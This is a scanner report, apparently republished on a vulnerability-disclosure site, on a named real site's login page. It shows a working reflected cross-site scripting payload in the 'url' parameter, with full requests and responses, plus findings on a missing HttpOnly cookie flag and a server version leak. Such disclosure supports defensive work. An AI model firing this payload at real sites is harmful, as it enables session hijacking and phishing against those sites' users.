Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, Google Hacking Database, DORK Search

CWE-79 XSS Crawler - XSS Engine
CWE-89 SQLi Crawler - SQLi Engine
CWE-113 HTTPi Crawler - HTTPi Engine
CWE-23 LFI, RFI Crawler - LFI, RFI Engine

XSS.CX Home

The DORK Report

Loading

Netsparker, Web Application Security Scanner

XSS, Cross Site Scripting, CWE-79, CAPEC-86, Javascript Injection

Netsparker - Scan Report Summary
TARGET URL
http://www.codetoad.com/members/login.asp?url...
SCAN DATE
3/6/2011 10:44:07 AM
REPORT DATE
3/6/2011 10:48:37 AM
SCAN DURATION
00:00:34

Total Requests

Average Speed

req/sec.
3
identified
2
confirmed
0
critical
1
informational

GHDB, DORK Tests

GHDB, DORK Tests
PROFILE
Previous Settings
ENABLED ENGINES
Static Tests, Find Backup Files, Blind Command Injection, Blind SQL Injection, Boolean SQL Injection, Command Injection, HTTP Header Injection, Local File Inclusion, Open Redirection, Remote Code Evaluation, Remote File Inclusion, SQL Injection, Cross-site Scripting
Authentication
Scheduled

VULNERABILITIES

Vulnerabilities
Netsparker - Web Application Security Scanner
IMPORTANT
33 %
LOW
33 %
INFORMATION
33 %
Cross-site Scripting

Cross-site Scripting

1 TOTAL
IMPORTANT
CONFIRMED
1
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.

XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:
  • Hi-jacking users' active session
  • Changing the look of the page within the victims browser.
  • Mounting a successful phishing attack.
  • Intercept data and perform man-in-the-middle attacks.

Remedy

The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.

Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.

There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.

Remedy References

External References

- /members/login.asp

/members/login.asp CONFIRMED

http://www.codetoad.com/members/login.asp?url='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x..

Parameters

Parameter Type Value
url GET '"--></style></script><script>alert(0x000013)</script>

Request

GET /members/login.asp?url='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000013)%3C/script%3E HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.codetoad.com
Cookie: ASPSESSIONIDQCTDBARC=CMMLJKMBGCKIIHPNDGEHDOKM
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 06 Mar 2011 16:44:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 17132
Content-Type: text/html
Cache-control: private



<html>
<head>
<title></title>
<meta name="description" content>
<meta name="keywords" content>
<meta name="generator" content="CuteHTML">
</head>


<LINK href="/images/style4.css" type=text/css rel=stylesheet>






</HEAD>


<BODY bgColor=#ffffff leftMargin=0 topMargin=0 marginwidth="0"
marginheight="0"><A name=top></A>

<TABLE cellSpacing=0 cellPadding=0 width="100%" border=0>
<TBODY>
<TR>
<TD>
<TABLE cellSpacing=0 cellPadding=0 width="100%" border=0>
<TBODY>
<TR>
<TD bgcolor=#0099ff colSpan=3 height=1><img src=/images/frog_slit.gif height=2 width=72></TD></TR>
<TR>
<TD bgcolor=#0066cc vAlign=top noWrap><A
href="/"><IMG height=36
alt=codetoad.com src="/images/codetoad3.gif" width=309
border=0></A></TD>

<td nowrap width=240 height=36
bgcolor=#0066cc><div class=loginbox
style="WIDTH: 240px;height:36;padding:3px;valign:middle">&nbsp;&nbsp;<a href=http://www.codetoad.com/demos/shopping_cart/>ASP Shopping
Cart</a>,&nbsp;<a href=http://www.codetoad.com/demos/forum/>Forum</a>&nbsp;&amp;&nbsp;<a href=http://www.codetoad.com/demos/blog/>BBS</a><BR>
&nbsp;&nbsp;- all for $20 from <a href=http://www.codetoad.com/plus/>CodeToad Plus!</a></div></td>



<TD height=36 bgcolor=#0066cc nowrap align=right valign=middle>



<div style="WIDTH: 130px">
<a href="/members/login.asp?url=http://www.codetoad.com/members/login.asp"><img src=/images/login_sq.png border=0></a>&nbsp;<a
href="/members/join.asp"><img src=/images/join_sq.png border=0></a>&nbsp;
</div>


</TD> <td bgcolor=#0066cc width=3><img src=/images/sp.gif width=3 height=1></td>

</TR>
<tr >

<TD colSpan=3 height=10 width=100%><img src=/images/frog_slit4.gif height=10 width=100%></TD></TR>
<TR>
</TBODY></TABLE>
<TABLE cellSpacing=0 cellPadding=0 width="100%" border=0 height=25>


<TR height=25><TD bgcolor=#FFFBDE >&nbsp;&nbsp;<A class=menu_text style="FONT-SIZE: smaller" href="/" title="CodeToad Home Page" target=_top>Home</A>&nbsp;||&nbsp;<A class=menu_text style="FONT-SIZE: smaller" title="asp scripts and tutorials" href="/asp" target=_top>ASP</A>&nbsp;|&nbsp;<A class=menu_text style="FONT-SIZE: smaller" title="asp.net scripts and tutorials" href="/asp.net/" target=_top>ASP.Net</A>&nbsp;|&nbsp;<A class=menu_text style="FONT-SIZE: smaller" title="C++ scripts and tutorials" href="/c" target=_top>C++/C#</A>&nbsp;|&nbsp;<A class=menu_text style="FONT-SIZE: smaller" title="dhtml scripts and tutorials" href="/dhtml" target=_top>DHTML</A>&nbsp;|&nbsp;<A class=menu_text style="FONT-SIZE: smaller" title="html scripts and tutorials" href="/html" target=_top>HTML</A>&nbsp;|&nbsp;<A class=menu_text style="FONT-SIZE: smaller" title="java scripts and tutorials" href="/java" target=_top>Java</A>&nbsp;|&nbsp;<A class=menu_text style="FONT-SIZE: smaller" title="javascript scripts and tutorials" href="/javascript" target=_top>Javascript</A>&nbsp;|&nbsp;<A class=menu_text style="FONT-SIZE: smaller" title="perl scripts and tutorials" href="/perl" target=_top>Perl</A>&nbsp;|&nbsp;<A class=menu_text style="FONT-SIZE: smaller" title="visual basic scripts and tutorials" href="/visual_basic" target=_top>VB</A>&nbsp;|&nbsp;<A class=menu_text style="FONT-SIZE: smaller" title="xml scripts and tutorials" href="/xml" target=_top>XML</A>&nbsp;||&nbsp;<A class=menu_text style="FONT-SIZE: smaller" title="shopping cart source code and more.." href="/plus" target=_top>CodeToad&nbsp;Plus!</A>&nbsp;||&nbsp;<A class=menu_text style="FONT-SIZE: smaller" title="codetoad forums" href="/forum" target=_top>Forums</A>&nbsp;||&nbsp;<A class=menu_text style="FONT-SIZE: smaller" title="ram memory upgrades" href="/store/ram-memory/" target=_top>RAM</A>&nbsp;</TD>
</TR></table>



<TABLE cellSpacing=0 cellPadding=0 width="100%" border=0 height=25>
<TR height=25>
<form action=/search.asp method=get id=search_form name=search_form>
<TD bgcolor=#FFFBDE align=center><table><td>
<font face="arial,helvetica" size=2><b>Search Site: </b></td>
<td bgcolor=f5f5f5 height=10 align="right" VALIGN=middle><input type=text name=keyword size=15 class="displayINPUT" ></td>
<td bgcolor=f5f5f5 height=10 align="right" VALIGN=middle><input type=submit value="GO" style="background-color:efefef;font-size:10px;font-weight:bold" border=0 width=21 height=21 hspace=1 vspace=1 id=image1 name=image1>
</td></form>
</TR>
</TABLE></td></tr></table>


<TABLE cellSpacing=0 cellPadding=0 width="100%" border=0>
<TBODY>
<TR>
<TD bgcolor=#003399><IMG height=1 alt=""
src="/images/sp.gif" width=6></TD>
<TD bgcolor=black width=1920><IMG height=1 alt=""
src="/images/sp.gif"
width=745></TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE>


<TABLE cellSpacing=0 cellPadding=0 width=100% height=100% border=0>
<TBODY>
<TR><td valign=top>







<TD class=back1 vAlign=top height=100% valign=top>


<table border=0 width=100%>
<Tr><td valign=top colspan=2>
</td></tr>


<tr><td valign=top width=100%>


<!-- already start of next td of main table //-->
<table cellpadding="0" cellspacing="0" border="0" width="100%" align="center">
<tr><td height="1" width="100%" >
<h3>Members' Login.</h3></td></tr></table>

<font face="arial" size="2" color=red>***
<b> The page you are trying to access requires you to be logged in .***<BR><BR>
</font>


<table BORDER="0" width="600" align="center">
<form METHOD="POST" ACTION="login2.asp" name="form_tab">


<tr><td colspan="3">
<table bgcolor="black" width="90%" cellspacing="0" cellpadding="1"><tr><td>
<table bgcolor="f5f5f5" width="100%">
<tr><td colspan="3"><b>Members' Login.</b>
<br><img src="../images/sp.gif" height="2"></td></tr>
<tr><td>
<table width="100%">
<tr><td>Email:</td><td><input TYPE="text" SIZE="20" NAME="email" value></td></tr>
<tr>
<td>Password:</td><td><input TYPE="password" SIZE="20" NAME="password"></td></tr>

<input type=hidden name=url value="'"--></style></script><script>netsparker(0x000013)</script>">

<tr>
<td></td><td><input type="submit" value=" - L o g i n - " style="background-color:efefef" ></td>
</tr></form></table>
</td></tr></table></td></tr></table>
</td></tr>
</table>

<p><font color="black">
<a href="forgotten.asp"><b>Forgotten your password?</b></a> <br><br>
For more
information on becoming a member, <a href="join.asp"><b>click here</b></a>.
<b> </b><br><br>
</div>



<!-- content ends here -->


</td> <td width=170 valign=top>












<table align=center width=100% cellpadding=0 cellspacing=1><tr><td>
<table width=100% cellpadding=0 cellspacing=0 ><tr><td align=center>
















<TR>
<TD align=middle><FONT face="MS Sans serif, arial, verdana,helvetica"
color=#ffffff size=-3><B> </B></FONT> </TD>
</TR>

<tr><td width=160 valign=top align=center><BR>




<script type="text/javascript"><!--
google_ad_client = "pub-1899416976695671";
google_ad_width = 120;
google_ad_height = 600;
google_ad_format = "120x600_as";
google_color_border = "FFFFCC";
google_color_bg = "FFFFFF";
google_color_link = "0000FF";
google_color_url = "008000";
google_color_text = "000000";
google_ad_channel ="9541164047";

google_ad_type = "text_image";
//--></script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>

<BR><BR>






<BR>
<div class=boxes>
<table width=160 bgcolor=ffffff>
<tr><td align=center valign=top>
<b>Useful Links</b>
<BR><img src=/images/sp.gif height=6><BR>
<font class="box_text" size=2>


<a href="http://www.faxcritics.com/">Online Fax Reviews</a>
<BR><img src=/images/sp.gif height=6><BR>



<a href="http://www.topwebhostreview.net/fatcow-review/" title="FatCow Web Hosting Reviews">FatCow Review</a>

<BR><img src=/images/sp.gif height=6><BR>

<a href="http://www.specialtyansweringservice.net">Answering Service</a>

<BR><img src=/images/sp.gif height=6><BR>













</td></tr><tr><td align=right valign=top>
<font size=1><a href=/help/advertise_bar.asp>Advertise here</a></font></td></tr></table>
</div>
<BR>


<BR>
<div class=boxes>
<table width=160 bgcolor=ffffff><tr><td align=center valign=top><b>CodeToad Experts</b>
<BR><img src=/images/sp.gif height=6><BR>
<font class="box_text" size=2>Can't find the answer?<BR>
Our <b><a href=http://www.codetoad.com/experts.asp>Site experts</a></b>
are answering questions for free in the <b><a href=http://www.codetoad.com/forum/>CodeToad forums</a></b>
</font></td></tr></table>
</div>

</td>
</tr></table></td></tr>
</table>



</td></tr>

</table>



<table align=center width=100% cellpadding=0 cellspacing=0 border=0>
<tr>


<td width=100% align=center>

<BR><BR><BR><BR><BR><BR><BR><BR>

<table>
<TR>
<TD align=middle><FONT face="MS Sans serif, arial, verdana,helvetica"
color=#000000 size=-3><B>Recent Forum Threads</B></FONT> </TD>
</TR>
<tr><td align=center>
<table width=100% cellpadding=0 cellspacing=0 bgcolor=white>
<tr bgcolor=#ffffff><td valign=top>&#149;&nbsp;</td><td><a style="font-size:10px" href=http://www.codetoad.com/forum/14_24392.asp>Re: drop-down menu selected value</a></td></tr>
<tr bgcolor=#eeeeee><td valign=top>&#149;&nbsp;</td><td><a style="font-size:10px" href=http://www.codetoad.com/forum/14_20958.asp>Re: Loading Sequence of Frames</a></td></tr>
<tr bgcolor=#ffffff><td valign=top>&#149;&nbsp;</td><td><a style="font-size:10px" href=http://www.codetoad.com/forum/16_22580.asp>Re: Auto Reply</a></td></tr>
<tr bgcolor=#eeeeee><td valign=top>&#149;&nbsp;</td><td><a style="font-size:10px" href=http://www.codetoad.com/forum/25_28060.asp>Re: dereferenceing a string to a constant name</a></td></tr>
<tr bgcolor=#ffffff><td valign=top>&#149;&nbsp;</td><td><a style="font-size:10px" href=http://www.codetoad.com/forum/16_25107.asp>Re: how can i make link</a></td></tr>
<tr bgcolor=#eeeeee><td valign=top>&#149;&nbsp;</td><td><a style="font-size:10px" href=http://www.codetoad.com/forum/23_26353.asp>Re: onclick thumbnail images in gridview or datalist</a></td></tr>
<tr bgcolor=#ffffff><td valign=top>&#149;&nbsp;</td><td><a style="font-size:10px" href=http://www.codetoad.com/forum/18_24629.asp>Re: The Dim appExcel As Excel.Application doesn`t work ????</a></td></tr>
<tr bgcolor=#eeeeee><td valign=top>&#149;&nbsp;</td><td><a style="font-size:10px" href=http://www.codetoad.com/forum/24_27273.asp>Re: c# .net Exception of type System.StackOverflowException was thrown.</a></td></tr>
<tr bgcolor=#ffffff><td valign=top>&#149;&nbsp;</td><td><a style="font-size:10px" href=http://www.codetoad.com/forum/15_27598.asp>Re: Plz its urgent:validation code</a></td></tr>
</table>
<BR><BR>
</td></tr>


<TR>
<TD align=middle><FONT face="MS Sans serif, arial, verdana,helvetica"
color=#000000 size=-3><B>Recent Articles</B></FONT> </TD>
</TR>
<tr><td align=center>
<table width=100% cellpadding=0 cellspacing=0 bgcolor=white>
<tr bgcolor=#ffffff><td valign=top><img src=http://www.codetoad.com/images/article.gif></td><td><a style="font-size:10px" href=http://www.codetoad.com/asp_filesys_gettempname.asp>ASP GetTempName </a></td></tr>
<tr bgcolor=#eeeeee><td valign=top><img src=http://www.codetoad.com/images/article.gif></td><td><a style="font-size:10px" href=http://www.codetoad.com/asp_utf8.asp>Decode and Encode UTF-8</a></td></tr>
<tr bgcolor=#ffffff><td valign=top><img src=http://www.codetoad.com/images/article.gif></td><td><a style="font-size:10px" href=http://www.codetoad.com/asp_filesys_getfile.asp>ASP GetFile</a></td></tr>
<tr bgcolor=#eeeeee><td valign=top><img src=http://www.codetoad.com/images/article.gif></td><td><a style="font-size:10px" href=http://www.codetoad.com/asp_filesys_folderexists.asp>ASP FolderExists </a></td></tr>
<tr bgcolor=#ffffff><td valign=top><img src=http://www.codetoad.com/images/article.gif></td><td><a style="font-size:10px" href=http://www.codetoad.com/asp_filesys_fileexists.asp>ASP FileExists</a></td></tr>
<tr bgcolor=#eeeeee><td valign=top><img src=http://www.codetoad.com/images/article.gif></td><td><a style="font-size:10px" href=http://www.codetoad.com/asp_filesys_opentextfile.asp>ASP OpenTextFile </a></td></tr>
<tr bgcolor=#ffffff><td valign=top><img src=http://www.codetoad.com/images/article.gif></td><td><a style="font-size:10px" href=http://www.codetoad.com/asp_filesystemobject.asp>ASP FilesystemObject</a></td></tr>
<tr bgcolor=#eeeeee><td valign=top><img src=http..
Cookie Not Marked As HttpOnly

Cookie Not Marked As HttpOnly

1 TOTAL
LOW
CONFIRMED
1
Cookie was not marked as HTTPOnly. HTTPOnly cookies can not be read by client-side scripts therefore marking a cookie as HTTPOnly can provide an additional layer of protection against Cross-site Scripting attacks..

Impact

During a Cross-site Scripting attack an attacker might easily access cookies and hijack the victim's session.

Actions to Take

  1. See the remedy for solution
  2. Consider marking all of the cookies used by the application as HTTPOnly (After these changes javascript code will not able to read cookies.

Remedy

Mark the cookie as HTTPOnly. This will be an extra layer of defence against XSS. However this is not a silver bullet and will not protect the system against Cross-site Scripting attacks. An attacker can use a tool such as XSS Tunnel to bypass HTTPOnly protection.

External References

- /members/login.asp

/members/login.asp CONFIRMED

http://www.codetoad.com/members/login.asp?url=http://www.codetoad.com/javascript/form_validation_fun..

Identified Cookie

ASPSESSIONIDQCTDBARC

Request

GET /members/login.asp?url=http://www.codetoad.com/javascript/form_validation_function.asp HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.codetoad.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sun, 06 Mar 2011 16:43:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 17136
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCTDBARC=CMMLJKMBGCKIIHPNDGEHDOKM; path=/
Cache-control: private



<html>
<head>
<title></title>
<meta name="description" content>
<meta name="keywords" content>
<meta name="generator" content="CuteHTML">
</head>


<LINK href="/images/style4.css" type=text/css rel=stylesheet>






</HEAD>


<BODY bgColor=#ffffff leftMargin=0 topMargin=0 marginwidth="0"
marginheight="0"><A name=top></A>

<TABLE cellSpacing=0 cellPadding=0 width="100%" border=0>
<TBODY>
<TR>
<TD>
<TABLE cellSpacing=0 cellPadding=0 width="100%" border=0>
<TBODY>
<TR>
<TD bgcolor=#0099ff colSpan=3 height=1><img src=/images/frog_slit.gif height=2 width=72></TD></TR>
<TR>
<TD bgcolor=#0066cc vAlign=top noWrap><A
href="/"><IMG height=36
alt=codetoad.com src="/images/codetoad3.gif" width=309
border=0></A></TD>

<td nowrap width=240 height=36
bgcolor=#0066cc><div class=loginbox
style="WIDTH: 240px;height:36;padding:3px;valign:middle">&nbsp;&nbsp;<a href=http://www.codetoad.com/demos/shopping_cart/>ASP Shopping
Cart</a>,&nbsp;<a href=http://www.codetoad.com/demos/forum/>Forum</a>&nbsp;&amp;&nbsp;<a href=http://www.codetoad.com/demos/blog/>BBS</a><BR>
&nbsp;&nbsp;- all for $20 from <a href=http://www.codetoad.com/plus/>CodeToad Plus!</a></div></td>



<TD height=36 bgcolor=#0066cc nowrap align=right valign=middle>



<div style="WIDTH: 130px">
<a href="/members/login.asp?url=http://www.codetoad.com/members/login.asp"><img src=/images/login_sq.png border=0></a>&nbsp;<a
href="/members/join.asp"><img src=/images/join_sq.png border=0></a>&nbsp;
</div>


</TD> <td bgcolor=#0066cc width=3><img src=/images/sp.gif width=3 height=1></td>

</TR>
<tr >

<TD colSpan=3 height=10 width=100%><img src=/images/frog_slit4.gif height=10 width=100%></TD></TR>
<TR>
</TBODY></TABLE>
<TABLE cellSpacing=0 cellPadding=0 width="100%" border=0 height=25>


<TR height=25><TD bgcolor=#FFFBDE >&nbsp;&nbsp;<A class=menu_text style="FONT-SIZE: smaller" href="/" title="CodeToad Home Page" target=_top>Home</A>&nbsp;||&nbsp;<A class=menu_text style="FONT-SIZE: smaller" title="asp scripts and tutorials" href="/asp" target=_top>ASP</A>&nbsp;|&nbsp;<A class=menu_text style="FONT-SIZE: smaller" title="asp.net scripts and tutorials" href="/asp.net/" target=_top>ASP.Net</A>&nbsp;|&nbsp;<A class=menu_text style="FONT-SIZE: smaller" title="C++ scripts and tutorials" href="/c" target=_top>C++/C#</A>&nbsp;|&nbsp;<A class=menu_text style="FONT-SIZE: smaller" title="dhtml scripts and tutorials" href="/dhtml" target=_top>DHTML</A>&nbsp;|&nbsp;<A class=menu_text style="FONT-SIZE: smaller" title="html scripts and tutorials" href="/html" target=_top>HTML</A>&nbsp;|&nbsp;<A class=menu_text style="FONT-SIZE: smaller" title="java scripts and tutorials" href="/java" target=_top>Java</A>&nbsp;|&nbsp;<A class=menu_text style="FONT-SIZE: smaller" title="javascript scripts and tutorials" href="/javascript" target=_top>Javascript</A>&nbsp;|&nbsp;<A class=menu_text style="FONT-SIZE: smaller" title="perl scripts and tutorials" href="/perl" target=_top>Perl</A>&nbsp;|&nbsp;<A class=menu_text style="FONT-SIZE: smaller" title="visual basic scripts and tutorials" href="/visual_basic" target=_top>VB</A>&nbsp;|&nbsp;<A class=menu_text style="FONT-SIZE: smaller" title="xml scripts and tutorials" href="/xml" target=_top>XML</A>&nbsp;||&nbsp;<A class=menu_text style="FONT-SIZE: smaller" title="shopping cart source code and more.." href="/plus" target=_top>CodeToad&nbsp;Plus!</A>&nbsp;||&nbsp;<A class=menu_text style="FONT-SIZE: smaller" title="codetoad forums" href="/forum" target=_top>Forums</A>&nbsp;||&nbsp;<A class=menu_text style="FONT-SIZE: smaller" title="ram memory upgrades" href="/store/ram-memory/" target=_top>RAM</A>&nbsp;</TD>
</TR></table>



<TABLE cellSpacing=0 cellPadding=0 width="100%" border=0 height=25>
<TR height=25>
<form action=/search.asp method=get id=search_form name=search_form>
<TD bgcolor=#FFFBDE align=center><table><td>
<font face="arial,helvetica" size=2><b>Search Site: </b></td>
<td bgcolor=f5f5f5 height=10 align="right" VALIGN=middle><input type=text name=keyword size=15 class="displayINPUT" ></td>
<td bgcolor=f5f5f5 height=10 align="right" VALIGN=middle><input type=submit value="GO" style="background-color:efefef;font-size:10px;font-weight:bold" border=0 width=21 height=21 hspace=1 vspace=1 id=image1 name=image1>
</td></form>
</TR>
</TABLE></td></tr></table>


<TABLE cellSpacing=0 cellPadding=0 width="100%" border=0>
<TBODY>
<TR>
<TD bgcolor=#003399><IMG height=1 alt=""
src="/images/sp.gif" width=6></TD>
<TD bgcolor=black width=1920><IMG height=1 alt=""
src="/images/sp.gif"
width=745></TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE>


<TABLE cellSpacing=0 cellPadding=0 width=100% height=100% border=0>
<TBODY>
<TR><td valign=top>







<TD class=back1 vAlign=top height=100% valign=top>


<table border=0 width=100%>
<Tr><td valign=top colspan=2>
</td></tr>


<tr><td valign=top width=100%>


<!-- already start of next td of main table //-->
<table cellpadding="0" cellspacing="0" border="0" width="100%" align="center">
<tr><td height="1" width="100%" >
<h3>Members' Login.</h3></td></tr></table>

<font face="arial" size="2" color=red>***
<b> The page you are trying to access requires you to be logged in .***<BR><BR>
</font>


<table BORDER="0" width="600" align="center">
<form METHOD="POST" ACTION="login2.asp" name="form_tab">


<tr><td colspan="3">
<table bgcolor="black" width="90%" cellspacing="0" cellpadding="1"><tr><td>
<table bgcolor="f5f5f5" width="100%">
<tr><td colspan="3"><b>Members' Login.</b>
<br><img src="../images/sp.gif" height="2"></td></tr>
<tr><td>
<table width="100%">
<tr><td>Email:</td><td><input TYPE="text" SIZE="20" NAME="email" value></td></tr>
<tr>
<td>Password:</td><td><input TYPE="password" SIZE="20" NAME="password"></td></tr>

<input type=hidden name=url value="http://www.codetoad.com/javascript/form_validation_function.asp">

<tr>
<td></td><td><input type="submit" value=" - L o g i n - " style="background-color:efefef" ></td>
</tr></form></table>
</td></tr></table></td></tr></table>
</td></tr>
</table>

<p><font color="black">
<a href="forgotten.asp"><b>Forgotten your password?</b></a> <br><br>
For more
information on becoming a member, <a href="join.asp"><b>click here</b></a>.
<b> </b><br><br>
</div>



<!-- content ends here -->


</td> <td width=170 valign=top>












<table align=center width=100% cellpadding=0 cellspacing=1><tr><td>
<table width=100% cellpadding=0 cellspacing=0 ><tr><td align=center>
















<TR>
<TD align=middle><FONT face="MS Sans serif, arial, verdana,helvetica"
color=#ffffff size=-3><B> </B></FONT> </TD>
</TR>

<tr><td width=160 valign=top align=center><BR>




<script type="text/javascript"><!--
google_ad_client = "pub-1899416976695671";
google_ad_width = 120;
google_ad_height = 600;
google_ad_format = "120x600_as";
google_color_border = "FFFFCC";
google_color_bg = "FFFFFF";
google_color_link = "0000FF";
google_color_url = "008000";
google_color_text = "000000";
google_ad_channel ="9541164047";

google_ad_type = "text_image";
//--></script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>

<BR><BR>






<BR>
<div class=boxes>
<table width=160 bgcolor=ffffff>
<tr><td align=center valign=top>
<b>Useful Links</b>
<BR><img src=/images/sp.gif height=6><BR>
<font class="box_text" size=2>


<a href="http://www.faxcritics.com/">Online Fax Reviews</a>
<BR><img src=/images/sp.gif height=6><BR>



<a href="http://www.topwebhostreview.net/fatcow-review/" title="FatCow Web Hosting Reviews">FatCow Review</a>

<BR><img src=/images/sp.gif height=6><BR>

<a href="http://www.specialtyansweringservice.net">Answering Service</a>

<BR><img src=/images/sp.gif height=6><BR>













</td></tr><tr><td align=right valign=top>
<font size=1><a href=/help/advertise_bar.asp>Advertise here</a></font></td></tr></table>
</div>
<BR>


<BR>
<div class=boxes>
<table width=160 bgcolor=ffffff><tr><td align=center valign=top><b>CodeToad Experts</b>
<BR><img src=/images/sp.gif height=6><BR>
<font class="box_text" size=2>Can't find the answer?<BR>
Our <b><a href=http://www.codetoad.com/experts.asp>Site experts</a></b>
are answering questions for free in the <b><a href=http://www.codetoad.com/forum/>CodeToad forums</a></b>
</font></td></tr></table>
</div>

</td>
</tr></table></td></tr>
</table>



</td></tr>

</table>



<table align=center width=100% cellpadding=0 cellspacing=0 border=0>
<tr>


<td width=100% align=center>

<BR><BR><BR><BR><BR><BR><BR><BR>

<table>
<TR>
<TD align=middle><FONT face="MS Sans serif, arial, verdana,helvetica"
color=#000000 size=-3><B>Recent Forum Threads</B></FONT> </TD>
</TR>
<tr><td align=center>
<table width=100% cellpadding=0 cellspacing=0 bgcolor=white>
<tr bgcolor=#ffffff><td valign=top>&#149;&nbsp;</td><td><a style="font-size:10px" href=http://www.codetoad.com/forum/14_24392.asp>Re: drop-down menu selected value</a></td></tr>
<tr bgcolor=#eeeeee><td valign=top>&#149;&nbsp;</td><td><a style="font-size:10px" href=http://www.codetoad.com/forum/14_20958.asp>Re: Loading Sequence of Frames</a></td></tr>
<tr bgcolor=#ffffff><td valign=top>&#149;&nbsp;</td><td><a style="font-size:10px" href=http://www.codetoad.com/forum/16_22580.asp>Re: Auto Reply</a></td></tr>
<tr bgcolor=#eeeeee><td valign=top>&#149;&nbsp;</td><td><a style="font-size:10px" href=http://www.codetoad.com/forum/25_28060.asp>Re: dereferenceing a string to a constant name</a></td></tr>
<tr bgcolor=#ffffff><td valign=top>&#149;&nbsp;</td><td><a style="font-size:10px" href=http://www.codetoad.com/forum/16_25107.asp>Re: how can i make link</a></td></tr>
<tr bgcolor=#eeeeee><td valign=top>&#149;&nbsp;</td><td><a style="font-size:10px" href=http://www.codetoad.com/forum/23_26353.asp>Re: onclick thumbnail images in gridview or datalist</a></td></tr>
<tr bgcolor=#ffffff><td valign=top>&#149;&nbsp;</td><td><a style="font-size:10px" href=http://www.codetoad.com/forum/18_24629.asp>Re: The Dim appExcel As Excel.Application doesn`t work ????</a></td></tr>
<tr bgcolor=#eeeeee><td valign=top>&#149;&nbsp;</td><td><a style="font-size:10px" href=http://www.codetoad.com/forum/24_27273.asp>Re: c# .net Exception of type System.StackOverflowException was thrown.</a></td></tr>
<tr bgcolor=#ffffff><td valign=top>&#149;&nbsp;</td><td><a style="font-size:10px" href=http://www.codetoad.com/forum/15_27598.asp>Re: Plz its urgent:validation code</a></td></tr>
</table>
<BR><BR>
</td></tr>


<TR>
<TD align=middle><FONT face="MS Sans serif, arial, verdana,helvetica"
color=#000000 size=-3><B>Recent Articles</B></FONT> </TD>
</TR>
<tr><td align=center>
<table width=100% cellpadding=0 cellspacing=0 bgcolor=white>
<tr bgcolor=#ffffff><td valign=top><img src=http://www.codetoad.com/images/article.gif></td><td><a style="font-size:10px" href=http://www.codetoad.com/asp_filesys_gettempname.asp>ASP GetTempName </a></td></tr>
<tr bgcolor=#eeeeee><td valign=top><img src=http://www.codetoad.com/images/article.gif></td><td><a style="font-size:10px" href=http://www.codetoad.com/asp_utf8.asp>Decode and Encode UTF-8</a></td></tr>
<tr bgcolor=#ffffff><td valign=top><img src=http://www.codetoad.com/images/article.gif></td><td><a style="font-size:10px" href=http://www.codetoad.com/asp_filesys_getfile.asp>ASP GetFile</a></td></tr>
<tr bgcolor=#eeeeee><td valign=top><img src=http://www.codetoad.com/images/article.gif></td><td><a style="font-size:10px" href=http://www.codetoad.com/asp_filesys_folderexists.asp>ASP FolderExists </a></td></tr>
<tr bgcolor=#ffffff><td valign=top><img src=http://www.codetoad.com/images/article.gif></td><td><a style="font-size:10px" href=http://www.codetoad.com/asp_filesys_fileexists.asp>ASP FileExists</a></td></tr>
<tr bgcolor=#eeeeee><td valign=top><img src=http://www.codetoad.com/images/article.gif></td><td><a style="font-size:10px" href=http://www.codetoad.com/asp_filesys_opentextfile.asp>ASP OpenTextFile </a></td></tr>
<tr bgcolor=#ffffff><td valign=top><img src=http://www.codetoad.com/images/article.gif></td><td><a style="font-size:10px" href=http://www.codetoad.com/asp_filesystemobject.asp>ASP FilesystemObject</a></td></tr>
<tr bgcolor=#eeee..
IIS Version Disclosure

IIS Version Disclosure

1 TOTAL
INFORMATION
Netsparker identified that the target web server is disclosing the web server's version in the HTTP response. This information can help an attacker to gain a greater understanding of the system in use and potentially develop further attacks targeted at the specific web server version.

Impact

An attacker can look for specific security vulnerabilities for the version identified through the SERVER header information.

Remediation

Configure your web server to prevent information leakage from the SERVER header of its HTTP response.
- /members/login.asp

/members/login.asp

http://www.codetoad.com/members/login.asp?url=http://www.codetoad.com/javascript/form_validation_fun..

Extracted Version

Microsoft-IIS/6.0

Request

GET /members/login.asp?url=http://www.codetoad.com/javascript/form_validation_function.asp HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.codetoad.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 06 Mar 2011 16:43:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 17136
Content-Type: text/html
